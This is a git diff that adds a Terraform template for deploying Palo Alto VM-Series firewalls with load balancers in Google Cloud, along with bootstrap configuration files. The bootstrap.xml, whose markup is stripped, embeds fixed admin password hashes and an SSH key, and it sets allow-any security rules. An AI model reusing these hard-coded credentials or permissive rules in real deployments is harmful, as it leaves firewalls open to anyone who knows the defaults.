diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt new file mode 100644 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes new file mode 100755 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml new file mode 100644 index 00000000..90c524a9 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/bootstrap.xml @@ -0,0 +1,706 @@ + + + + + + $1$eyegmtyu$VFbNwpbaZ8sUG40wpdo/A/ + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGogcGdseW5u + + + + + yes + + + $1$xxqwnwvr$El9XN5KexgoltjkVjbkcd0 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + health-check + + + + + + + + 3 + 5 + wait-recover + + + + + no + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + + + + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 35.191.0.0/16 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 130.211.0.0/22 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 10.10.1.0/24 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/1 + 10 + 10.10.2.0/24 + + + + + + + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + PA-VM + + + + yes + + + FQDN + + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + loopback.1 
+ + + + + + + ethernet1/2 + + + + + + + + + + + + + trust + + + trust + + + gcp-health-probes + + + any + + + any + + + any + + + any + + + any + + + any + + allow + universal + no + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + universal + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + trust + + + trust + + + gcp-health-probes + + + any + + any + ethernet1/1 + + loopback-interface + + No NAT on GCP LB health check. + + + + + + ethernet1/2 + + + + + untrust + + + trust + + + any + + + any + + any + + + + + + + + ethernet1/1 + ethernet1/2 + loopback.1 + + + +
+ + 35.191.0.0/16 + + gcp-resource + + + + 130.211.0.0/22 + + gcp-resource + + + + 100.64.0.1 + + gcp-resource + + Loopback interface for GLB healthcheck + +
+ + + + gcp-health-probe-1 + gcp-health-probe-2 + + + gcp-resource + + + + + + color6 + + + color13 + + + color24 + + +
+
+
+
+
diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt new file mode 100755 index 00000000..8d3c0290 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_outbound/init-cfg.txt @@ -0,0 +1,10 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 +op-command-modes=mgmt-interface-swap \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/diagram.png b/gcp/adv_peering_4fw_2spoke/diagram.png new file mode 100644 index 00000000..f45262b1 Binary files /dev/null and b/gcp/adv_peering_4fw_2spoke/diagram.png differ diff --git a/gcp/adv_peering_4fw_2spoke/fw_inbound.tf b/gcp/adv_peering_4fw_2spoke/fw_inbound.tf new file mode 100644 index 00000000..717d691e --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/fw_inbound.tf @@ -0,0 +1,76 @@ +#----------------------------------------------------------------------------------------------- +# Create bootstrap bucket for inbound firewalls +module "bootstrap_inbound" { + source = "./modules/gcp_bootstrap/" + bucket_name = "fw-bootstrap-inbound" + file_location = "bootstrap_files/fw_inbound/" + config = ["init-cfg.txt", "bootstrap.xml"] + license = ["authcodes"] +} + +#----------------------------------------------------------------------------------------------- +# Create inbound firewalls +module "fw_inbound" { + source = "./modules/vmseries/" + names = var.fw_names_inbound + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + subnetworks = [ + module.vpc_untrust.subnetwork_self_link[0], + module.vpc_mgmt.subnetwork_self_link[0], + module.vpc_trust.subnetwork_self_link[0] + ] + machine_type = var.fw_machine_type + bootstrap_bucket = module.bootstrap_inbound.bucket_name + mgmt_interface_swap = "enable" + ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : "" + image = "${var.fw_image}-${var.fw_panos}" + nic0_public_ip = true + nic1_public_ip = true + nic2_public_ip = false + create_instance_group = true + + dependencies = [ + module.bootstrap_inbound.completion, + ] +} + +#----------------------------------------------------------------------------------------------- +# Create public load balancer +module "glb" { + source = "./modules/glb/" + name = var.glb_name + backends = { + "0" = [ + { + group = module.fw_inbound.instance_group[0] + balancing_mode = null + capacity_scaler = null + description = null + max_connections = null + max_connections_per_instance = null + max_rate = null + max_rate_per_instance = null + max_utilization = null + }, + { + group = module.fw_inbound.instance_group[1] + balancing_mode = null + capacity_scaler = null + description = null + max_connections = null + max_connections_per_instance = null + max_rate = null + max_rate_per_instance = null + max_utilization = null + } + ] + } + backend_params = [ + // health check path, port name, port number, timeout seconds. 
+ "/,http,80,10" + ] +} + diff --git a/gcp/adv_peering_4fw_2spoke/fw_outbound.tf b/gcp/adv_peering_4fw_2spoke/fw_outbound.tf new file mode 100644 index 00000000..b97e8281 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/fw_outbound.tf @@ -0,0 +1,95 @@ +#----------------------------------------------------------------------------------------------- +# Create bootstrap bucket for outbound firewalls +module "bootstrap_outbound" { + source = "./modules/gcp_bootstrap/" + bucket_name = "fw-bootstrap-egress" + file_location = "bootstrap_files/fw_outbound/" + config = ["init-cfg.txt", "bootstrap.xml"] + license = ["authcodes"] +} + +#----------------------------------------------------------------------------------------------- +# Create outbound firewalls +module "fw_outbound" { + source = "./modules/vmseries/" + names = var.fw_names_outbound + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + subnetworks = [ + module.vpc_trust.subnetwork_self_link[0], + module.vpc_mgmt.subnetwork_self_link[0], + module.vpc_untrust.subnetwork_self_link[0] + ] + machine_type = var.fw_machine_type + bootstrap_bucket = module.bootstrap_outbound.bucket_name + mgmt_interface_swap = "enable" + ssh_key = fileexists(var.public_key_path) ? "admin:${file(var.public_key_path)}" : "" + image = "${var.fw_image}-${var.fw_panos}" + nic0_public_ip = false + nic1_public_ip = true + nic2_public_ip = true + create_instance_group = true + + dependencies = [ + module.bootstrap_outbound.completion, + ] +} + +#----------------------------------------------------------------------------------------------- +# Create 2 internal load balancers. LB-1 is A/A for internet. LB-2 is A/P for e-w. +module "ilb" { + source = "./modules/ilb/" + name = var.ilb_name + subnetworks = [module.vpc_trust.subnetwork_self_link[0]] + all_ports = true + ports = [] + health_check_port = "22" + + backends = { + "0" = [ + { + group = module.fw_outbound.instance_group[0] + failover = false + }, + { + group = module.fw_outbound.instance_group[1] + failover = false + } + ], + "1" = [ + { + group = module.fw_outbound.instance_group[0] + failover = false + }, + { + group = module.fw_outbound.instance_group[1] + failover = true + } + ] + } + providers = { + google = google-beta + } +} + +#----------------------------------------------------------------------------------------------- +# Create default route to internal LB. Route will be exported to spokes via GCP peering. 
+resource "google_compute_route" "default" { + name = "${var.ilb_name}-default" + provider = google-beta + dest_range = "0.0.0.0/0" + network = module.vpc_trust.vpc_self_link + next_hop_ilb = module.ilb.forwarding_rule[0] + priority = 99 +} + +resource "google_compute_route" "eastwest" { + name = "${var.ilb_name}-eastwest" + provider = google-beta + dest_range = "10.10.0.0/16" + network = module.vpc_trust.vpc_self_link + next_hop_ilb = module.ilb.forwarding_rule[1] + priority = 99 +} diff --git a/gcp/adv_peering_4fw_2spoke/fw_vpc.tf b/gcp/adv_peering_4fw_2spoke/fw_vpc.tf new file mode 100644 index 00000000..a1f096eb --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/fw_vpc.tf @@ -0,0 +1,35 @@ +#----------------------------------------------------------------------------------------------- +# Create firewall VPCs & subnets +module "vpc_mgmt" { + source = "./modules/vpc/" + + vpc = var.mgmt_vpc + subnets = var.mgmt_subnet + cidrs = var.mgmt_cidr + regions = [var.region] + allowed_sources = var.mgmt_sources + allowed_protocol = "TCP" + allowed_ports = ["443", "22"] +} + +module "vpc_untrust" { + source = "./modules/vpc/" + + vpc = var.untrust_vpc + subnets = var.untrust_subnet + cidrs = var.untrust_cidr + regions = [var.region] + allowed_sources = ["0.0.0.0/0"] +} + +module "vpc_trust" { + source = "./modules/vpc/" + + vpc = var.trust_vpc + subnets = var.trust_subnet + cidrs = var.trust_cidr + regions = [var.region] + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + diff --git a/gcp/adv_peering_4fw_2spoke/guide.pdf b/gcp/adv_peering_4fw_2spoke/guide.pdf new file mode 100644 index 00000000..8b4b69e6 Binary files /dev/null and b/gcp/adv_peering_4fw_2spoke/guide.pdf differ diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf new file mode 100644 index 00000000..a93e7956 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/main.tf @@ -0,0 +1,85 @@ +locals { + bucket_name = join("", [var.bucket_name, random_string.randomstring.result]) +} +resource "random_string" "randomstring" { + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + name = local.bucket_name + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = length(var.config) > 0 ? length(var.config) : "0" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_full" { + count = length(var.content) > 0 ? length(var.content) : "0" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_full" { + count = length(var.license) > 0 ? length(var.license) : "0" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_full" { + count = length(var.software) > 0 ? 
length(var.software) : "0" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "config_empty" { + count = length(var.config) == 0 ? 1 : 0 + name = "config/" + content = "config/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_empty" { + count = length(var.content) == 0 ? 1 : 0 + name = "content/" + content = "content/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_empty" { + count = length(var.license) == 0 ? 1 : 0 + name = "license/" + content = "license/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_empty" { + count = length(var.software) == 0 ? 1 : 0 + name = "software/" + content = "software/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "null_resource" "dependency_setter" { + depends_on = [ + google_storage_bucket.bootstrap, + google_storage_bucket_object.config_full, + google_storage_bucket_object.content_full, + google_storage_bucket_object.license_full, + google_storage_bucket_object.software_full, + google_storage_bucket_object.config_empty, + google_storage_bucket_object.content_empty, + google_storage_bucket_object.license_empty, + google_storage_bucket_object.software_empty, + ] +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf new file mode 100644 index 00000000..3697edba --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/outputs.tf @@ -0,0 +1,8 @@ +output "completion" { + value = null_resource.dependency_setter.id +} + +output "bucket_name" { + value = google_storage_bucket.bootstrap.name +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf new file mode 100644 index 00000000..ebe6f1de --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/gcp_bootstrap/variables.tf @@ -0,0 +1,24 @@ +variable "bucket_name" { +} + +variable "file_location" { +} + +variable "config" { + type = list(string) + default = [] +} + +variable "content" { + type = list(string) + default = [] +} + +variable "license" { + type = list(string) + default = [] +} + +variable "software" { + default = [] +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf new file mode 100644 index 00000000..bbfa03d6 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/glb/main.tf @@ -0,0 +1,89 @@ +resource "google_compute_global_forwarding_rule" "http" { + count = var.http_forward ? 1 : 0 + name = "${var.name}-http" + target = google_compute_target_http_proxy.default[0].self_link + ip_address = google_compute_global_address.default.address + port_range = "80" +} + +resource "google_compute_global_forwarding_rule" "https" { + count = var.ssl ? 1 : 0 + name = "${var.name}-https" + target = google_compute_target_https_proxy.default[0].self_link + ip_address = google_compute_global_address.default.address + port_range = "443" +} + +resource "google_compute_global_address" "default" { + name = "${var.name}-address" + ip_version = var.ip_version +} + +# HTTP proxy when ssl is false +resource "google_compute_target_http_proxy" "default" { + count = var.http_forward ? 
1 : 0 + name = "${var.name}-http-proxy" + url_map = compact( + concat([ + var.url_map], google_compute_url_map.default.*.self_link), + )[0] +} +# HTTPS proxy when ssl is true +resource "google_compute_target_https_proxy" "default" { + count = var.ssl ? 1 : 0 + name = "${var.name}-https-proxy" + url_map = compact( + concat([ + var.url_map], google_compute_url_map.default.*.self_link), )[0] + ssl_certificates = compact(concat(var.ssl_certificates, google_compute_ssl_certificate.default.*.self_link, ), ) +} + +resource "google_compute_ssl_certificate" "default" { + count = var.ssl && ! var.use_ssl_certificates ? 1 : 0 + name_prefix = "${var.name}-certificate" + private_key = var.private_key + certificate = var.certificate + + lifecycle { + create_before_destroy = true + } +} + +resource "google_compute_url_map" "default" { + count = var.create_url_map ? 1 : 0 + name = "${var.name}" + default_service = google_compute_backend_service.default[0].self_link +} + +resource "google_compute_backend_service" "default" { + count = length(var.backend_params) + name = "${var.name}-${count.index}" + port_name = split(",", var.backend_params[count.index])[1] + protocol = var.backend_protocol + timeout_sec = split(",", var.backend_params[count.index])[3] + dynamic "backend" { + for_each = var.backends[count.index] + content { + balancing_mode = lookup(backend.value, "balancing_mode") + capacity_scaler = lookup(backend.value, "capacity_scaler") + description = lookup(backend.value, "description") + group = lookup(backend.value, "group") + max_connections = lookup(backend.value, "max_connections") + max_connections_per_instance = lookup(backend.value, "max_connections_per_instance") + max_rate = lookup(backend.value, "max_rate") + max_rate_per_instance = lookup(backend.value, "max_rate_per_instance") + max_utilization = lookup(backend.value, "max_utilization") + } + } + health_checks = [ + google_compute_http_health_check.default[count.index].self_link] + security_policy = var.security_policy + enable_cdn = var.cdn +} + +resource "google_compute_http_health_check" "default" { + count = length(var.backend_params) + name = "${var.name}-check-${count.index}" + request_path = split(",", var.backend_params[count.index])[0] + port = split(",", var.backend_params[count.index])[2] +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf new file mode 100644 index 00000000..3c1a64f7 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/glb/outputs.tf @@ -0,0 +1,4 @@ +output "address" { + value = google_compute_global_address.default.address +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf new file mode 100644 index 00000000..742bedfb --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/glb/variables.tf @@ -0,0 +1,95 @@ +variable "ip_version" { + description = "IP version for the Global address (IPv4 or v6) - Empty defaults to IPV4" + type = string + default = "" +} + +variable "name" { + description = "Name for the forwarding rule and prefix for supporting resources" + type = string +} + +variable "backends" { + description = "Map backend indices to list of backend maps." 
+ type = map(list(object({ + group = string + balancing_mode = string + capacity_scaler = number + description = string + max_connections = number + max_connections_per_instance = number + max_rate = number + max_rate_per_instance = number + max_utilization = number + }))) +} + +variable "backend_params" { + description = "Comma-separated encoded list of parameters in order: health check path, service port name, service port, backend timeout seconds" + type = list(string) +} + +variable "backend_protocol" { + description = "The protocol with which to talk to the backend service" + default = "HTTP" +} + +variable "create_url_map" { + description = "Set to `false` if url_map variable is provided." + type = bool + default = true +} + +variable "url_map" { + description = "The url_map resource to use. Default is to send all traffic to first backend." + type = string + default = "" +} + +variable "http_forward" { + description = "Set to `false` to disable HTTP port 80 forward" + type = bool + default = true +} + +variable "ssl" { + description = "Set to `true` to enable SSL support, requires variable `ssl_certificates` - a list of self_link certs" + type = bool + default = false +} + +variable "private_key" { + description = "Content of the private SSL key. Required if `ssl` is `true` and `ssl_certificates` is empty." + type = string + default = "" +} + +variable "certificate" { + description = "Content of the SSL certificate. Required if `ssl` is `true` and `ssl_certificates` is empty." + type = string + default = "" +} + +variable "use_ssl_certificates" { + description = "If true, use the certificates provided by `ssl_certificates`, otherwise, create cert from `private_key` and `certificate`" + type = bool + default = false +} + +variable "ssl_certificates" { + description = "SSL cert self_link list. Required if `ssl` is `true` and no `private_key` and `certificate` is provided." + type = list(string) + default = [] +} + +variable "security_policy" { + description = "The resource URL for the security policy to associate with the backend service" + type = string + default = "" +} + +variable "cdn" { + description = "Set to `true` to enable cdn on backend." 
+ type = bool + default = false +} \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf new file mode 100755 index 00000000..fee6e098 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/main.tf @@ -0,0 +1,33 @@ +resource "google_compute_health_check" "default" { + name = "${var.name}-check-0" + + tcp_health_check { + port = var.health_check_port + } +} +resource "google_compute_region_backend_service" "default" { + count = length(var.backends) + name = "${var.name}-${count.index}" + health_checks = [google_compute_health_check.default.self_link] + + dynamic "backend" { + for_each = var.backends[count.index] + content { + group = lookup(backend.value, "group") + failover = lookup(backend.value, "failover") + } + } + session_affinity = "NONE" +} + +resource "google_compute_forwarding_rule" "default" { + count = length(var.backends) + name = "${var.name}-all-${count.index}" + load_balancing_scheme = "INTERNAL" + ip_address = var.ip_address + ip_protocol = var.ip_protocol + all_ports = var.all_ports + ports = var.ports + subnetwork = var.subnetworks[0] + backend_service = google_compute_region_backend_service.default[count.index].self_link +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf new file mode 100644 index 00000000..2e1b10ef --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/outputs.tf @@ -0,0 +1,4 @@ +output "forwarding_rule" { + value = google_compute_forwarding_rule.default.*.self_link +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf new file mode 100644 index 00000000..f6bbeb80 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/ilb/variables.tf @@ -0,0 +1,33 @@ +variable "name" { +} + +variable "health_check_port" { + default = "22" +} + +variable "backends" { + description = "Map backend indices to list of backend maps." + type = map(list(object({ + group = string + failover = bool + }))) +} + +variable "subnetworks" { + type = list(string) +} + +variable "ip_address" { + default = null +} + +variable "ip_protocol" { + default = "TCP" +} +variable "all_ports" { + type = bool +} +variable "ports" { + type = list(string) + default = [] +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf new file mode 100644 index 00000000..2f42125b --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vm/main.tf @@ -0,0 +1,45 @@ +resource "google_compute_instance" "default" { + count = length(var.names) + name = element(var.names, count.index) + machine_type = var.machine_type + zone = element(var.zones, count.index) + can_ip_forward = true + allow_stopping_for_update = true + metadata_startup_script = var.startup_script + + metadata = { + serial-port-enable = true + ssh-keys = var.ssh_key + } + + network_interface { + subnetwork = element(var.subnetworks, count.index) + } + + boot_disk { + initialize_params { + image = var.image + } + } + + service_account { + scopes = var.scopes + } +} + + +resource "google_compute_instance_group" "default" { + count = var.create_instance_group ? 
length(var.names) : 0 + name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig" + zone = element(var.zones, count.index) + instances = [google_compute_instance.default[count.index].self_link] + + named_port { + name = "http" + port = "80" + } + + lifecycle { + create_before_destroy = true + } +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf new file mode 100644 index 00000000..a5c49887 --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vm/outputs.tf @@ -0,0 +1,11 @@ +output "vm_names" { + value = google_compute_instance.default.*.name +} + +output "vm_self_link" { + value = google_compute_instance.default.*.self_link +} + +output "instance_group" { + value = google_compute_instance_group.default.*.self_link +} diff --git a/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf new file mode 100644 index 00000000..102808ff --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vm/variables.tf @@ -0,0 +1,43 @@ +variable "names" { + type = list(string) +} + +variable "machine_type" { +} +variable "create_instance_group" { + type = bool + default = false +} + +variable "instance_group_names" { + type = list(string) + default = ["vmseries-instance-group"] +} +variable "zones" { + type = list(string) +} +variable "ssh_key" { + default = "" +} +variable "image" { +} + +variable "subnetworks" { + type = list(string) +} + +variable "scopes" { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable "startup_script" { + default = "" +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf new file mode 100644 index 00000000..c74ee4fa --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/main.tf @@ -0,0 +1,83 @@ +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + +resource "google_compute_instance" "vmseries" { + count = length(var.names) + name = element(var.names, count.index) + machine_type = var.machine_type + zone = element(var.zones, count.index) + min_cpu_platform = var.cpu_platform + can_ip_forward = true + allow_stopping_for_update = true + tags = var.tags + + metadata = { + mgmt-interface-swap = var.mgmt_interface_swap + vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket + serial-port-enable = true + ssh-keys = var.ssh_key + } + + service_account { + scopes = var.scopes + } + + network_interface { + + dynamic "access_config" { + for_each = var.nic0_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic0_ip, count.index) + subnetwork = var.subnetworks[0] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic1_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic1_ip, count.index) + subnetwork = var.subnetworks[1] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic2_public_ip ? 
[""] : [] + content {} + } + network_ip = element(var.nic2_ip, count.index) + subnetwork = var.subnetworks[2] + } + + boot_disk { + initialize_params { + image = var.image + type = var.disk_type + } + } + + depends_on = [ + null_resource.dependency_getter + ] +} + +resource "google_compute_instance_group" "vmseries" { + count = var.create_instance_group ? length(var.names) : 0 + name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig" + zone = element(var.zones, count.index) + instances = [google_compute_instance.vmseries[count.index].self_link] + + named_port { + name = "http" + port = "80" + } + + lifecycle { + create_before_destroy = true + } +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf new file mode 100644 index 00000000..01e5f41b --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/outputs.tf @@ -0,0 +1,24 @@ +output "vm_names" { + value = google_compute_instance.vmseries.*.name +} + +output "vm_self_link" { + value = google_compute_instance.vmseries.*.self_link +} + +output "instance_group" { + value = google_compute_instance_group.vmseries.*.self_link +} + +output "nic0_public_ip" { + value = var.nic0_public_ip ? google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip : [] +} + +output "nic1_public_ip" { + value = var.nic1_public_ip ? google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip : [] +} + +output "nic2_public_ip" { + value = var.nic2_public_ip ? google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip : [] +} + diff --git a/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf b/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf new file mode 100644 index 00000000..a10b4dbe --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/modules/vmseries/variables.tf @@ -0,0 +1,102 @@ +variable "subnetworks" { + type = list(string) +} + +variable "names" { + type = list(string) +} + +variable "machine_type" { +} + +variable "zones" { + type = list(string) +} + +variable "cpu_platform" { + default = "Intel Broadwell" +} +variable "disk_type" { + default = "pd-ssd" + #default = "pd-standard" +} +variable "bootstrap_bucket" { + default = "" +} + +variable "ssh_key" { + default = "" +} + +variable "public_lb_create" { + default = false +} + +variable "scopes" { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable "image" { +} + +variable "tags" { + type = list(string) + default = [] +} + +variable "create_instance_group" { + type = bool + default = false +} + +variable "instance_group_names" { + type = list(string) + default = ["vmseries-instance-group"] +} + +variable "dependencies" { + type = list(string) + default = [] +} + +variable "nic0_ip" { + type = list(string) + default = [""] +} + +variable "nic1_ip" { + type = list(string) + default = [""] +} + +variable "nic2_ip" { + type = list(string) + default = [""] +} + +variable "mgmt_interface_swap" { + default = "" +} + +variable "nic0_public_ip" { + type = bool + default = false +} + +variable "nic1_public_ip" { + type = bool + default = false +} + +variable "nic2_public_ip" { + type = bool + default = false +} diff --git 
